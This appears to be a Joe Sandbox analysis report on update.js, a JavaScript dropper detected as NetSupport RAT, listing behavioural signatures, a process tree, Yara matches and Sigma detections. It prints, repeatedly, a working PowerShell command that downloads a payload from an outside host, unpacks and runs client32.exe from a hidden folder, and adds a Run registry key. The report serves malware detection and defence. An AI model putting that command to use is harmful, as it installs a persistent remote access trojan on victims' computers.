Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
update.js

Overview

General Information

Sample name:update.js
Analysis ID:1518513
MD5:6b512b7d05171ac5d0fc13731733bc99
SHA1:4b3457c00cbb894882da95010abd6de1b6d784a4
SHA256:3465695bbb66e464f4aa08906f966f5fa1cf458a947c042726d529d9698b30fc
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • wscript.exe (PID: 3528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • wscript.exe (PID: 6612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6700 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1dce1c:$b1: ::WriteAllBytes(
  • 0x1dcc9c:$b2: ::FromBase64String(
  • 0x6ab3e:$s3: Reverse
  • 0x6abc6:$s3: Reverse
  • 0x6af22:$s3: reverse
  • 0x6af78:$s3: Reverse
  • 0x6afcb:$s3: Reverse
  • 0x6b25a:$s3: reverse
  • 0x6b2b0:$s3: Reverse
  • 0x6b2cc:$s3: reverse
  • 0x6b76c:$s3: Reverse
  • 0x6b7d5:$s3: Reverse
  • 0x6ba99:$s3: Reverse
  • 0x6bb05:$s3: Reverse
  • 0x6bb85:$s3: Reverse
  • 0x6bbfe:$s3: Reverse
  • 0x6bc5e:$s3: Reverse
  • 0x6bca2:$s3: reverse
  • 0x6bdfa:$s3: Reverse
  • 0x6be63:$s3: Reverse
  • 0x6bed9:$s3: Reverse

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 7 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      13.2.client32.exe.74360000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        13.2.client32.exe.73de0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          13.0.client32.exe.9f0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            13.2.client32.exe.111b8c68.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              13.2.client32.exe.111b8c68.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 6 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_3528.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                • 0x1c44d9:$b1: ::WriteAllBytes(
                                • 0x1c439f:$b2: ::FromBase64String(
                                • 0x60351:$s3: Reverse
                                • 0x603dc:$s3: Reverse
                                • 0x6066e:$s3: reverse
                                • 0x606c4:$s3: Reverse
                                • 0x60717:$s3: Reverse
                                • 0x609b0:$s3: reverse
                                • 0x60a06:$s3: Reverse
                                • 0x60a22:$s3: reverse
                                • 0x60e94:$s3: Reverse
                                • 0x60efe:$s3: Reverse
                                • 0x6118b:$s3: Reverse
                                • 0x611f8:$s3: Reverse
                                • 0x6127a:$s3: Reverse
                                • 0x612f4:$s3: Reverse
                                • 0x61355:$s3: Reverse
                                • 0x6139b:$s3: reverse
                                • 0x614fa:$s3: Reverse
                                • 0x61563:$s3: Reverse
                                • 0x615da:$s3: Reverse

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Base64 Encoded PowerShell Command Detected
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 79.141.163.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704
                                Sigma detected: Suspicious PowerShell Parameter Substring
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 3528, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WZZCVTPAZ
                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, 